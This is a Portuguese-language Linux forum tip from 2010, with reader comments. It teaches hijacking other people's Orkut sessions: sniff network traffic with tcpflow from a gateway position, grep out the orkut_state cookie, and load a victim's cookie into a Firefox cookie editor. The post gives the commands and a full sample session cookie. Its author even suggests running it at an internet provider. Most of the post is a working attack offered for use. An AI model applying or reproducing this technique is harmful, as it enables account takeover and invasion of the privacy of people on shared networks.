Estamos seguros no orkut?

Publicado por Vinícius de Oliveira Almeida em 13/09/2010

[ Hits: 9.015 ]

 


Estamos seguros no orkut?



Sou muito curioso na área de segurança e acabei descobrindo algo interessante. Muitos membros aqui já brincaram um pouco de hacker, pois bem, estou postando um tutorial que explora uma falha do Orkut. Espero que o Orkut resolva mais este bug...

Instalando o tcpflow (Sniffer)

Primeiramente iremos instalar um analisador de tráfego, o famoso tcpflow. Para quem nunca utilizou, peço que dê uma olhadinha no site:
Instale ou baixe o pacote já pronto.

CentOS:

# yum install tcpflow

Debian:

# apt-get install tcpflow

Slackware:

# wget http://linuxpackages.inode.at/Slackware-12.0/Console/tcpflow/tcpflow-0.21-i486-1kan.tgz
# installpkg tcpflow-0.21-i486-1kan.tgz

:D

Sniffando rede Orkut

Bem, primeiramente precisamos ser o gateway da rede para analisarmos o tráfego pelo tcpflow. Segue o comando:

# tcpflow -i eth1 host www.orkut.com.br

No parâmetro acima pegamos todo o tráfego do domínio orkut.com.br. Deixe rodando por 3 minutos e finalize.

Digite:

# cat * | grep orkut_state

Ira aparecer uma lista enorme com vários caractere... Procure pelo cookie chamado orkut_state.

ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0: USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1: TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws- cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg: PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0: GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:; S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:

O início tem que ser ORKUTPREF e o final S=sR9V6nHRSjxLiNw0:.

Este cookie contém todas as informações necessárias para capturar a sessão do usuário. Vou ensinar como pegar este arquivo e capturar a sessão.

:D

Utilizando o cookie

Primeiro você deve ter o Mozilla Firefox:
E o editor de cookies do Firefox:
Agora você vai em ferramentas/Cookie Editor e adicione o seguinte cookie:
  • Name: orkut_state
  • Content: Cole o cookie da vitima "ORKUTPREF=ID=", ex.:

    ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0: USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1: TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws- cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg: PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0: GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:; S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:

  • Domain: www.orkut.com.br
  • Path: /
  • Never Expires

Abra o site:
E pronto... está utilizando a sessão do cara.

Interessante, mas tomem cuidado.

valmeida@idea-planejamento.com

Outras dicas deste autor

Reduzindo o tempo de carregamento de seu site

Exploit dá acesso root em máquina local - kernels 2.6.17 e 2.6.24.1

Explorando vulnerabilidades em websites

Instalando Tcptrack no Slackware 13

Controle de banda com Shaper

Leitura recomendada

Acesso remoto no Insigne 5.0 por SSH

Criando pacotes RPM com o rpmbuild

Minhas impressões sobre o Slint 14.2

Atualizando para o novo Fedora 22

Coaching Gratuito em Linux

  

Comentários
[1] Comentário enviado por pael em 14/09/2010 - 00:32h

kkk muito bom xD

[2] Comentário enviado por gudrade em 14/09/2010 - 13:15h

Desculpe a pergunta ingénua, mas só funciona na rede local?

[3] Comentário enviado por murderb13 em 14/09/2010 - 14:24h

Muito bom.

[4] Comentário enviado por removido em 14/09/2010 - 14:33h


muito boa sua dica, o problema são as pessoas irresponsáveis (pseudo-hackerzinhos) ou mal intencionadas que possam fazer uso de algo tão bem descrito.

uma faca de 2 gumes: difundir conhecimento e ao mesmo tempo dar a arma pro bandido.

veja bem, não é crítica ao seu trabalho, apenas uma reflexão do tempo em que vivemos.

[5] Comentário enviado por removido em 14/09/2010 - 17:51h

Desculpe a pergunta ingénua, mas só funciona na rede local? [2]

[6] Comentário enviado por vinicius.almeida em 15/09/2010 - 01:46h

Funciona como gateway da rede. Imagina isso em um provedor de acesso?

[7] Comentário enviado por vinicius.almeida em 16/12/2011 - 16:27h

Fonte pode ser baixado

http://fossies.org/unix/privat/tcpflow-0.21.tar.gz
./configure
make
make install

:)



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts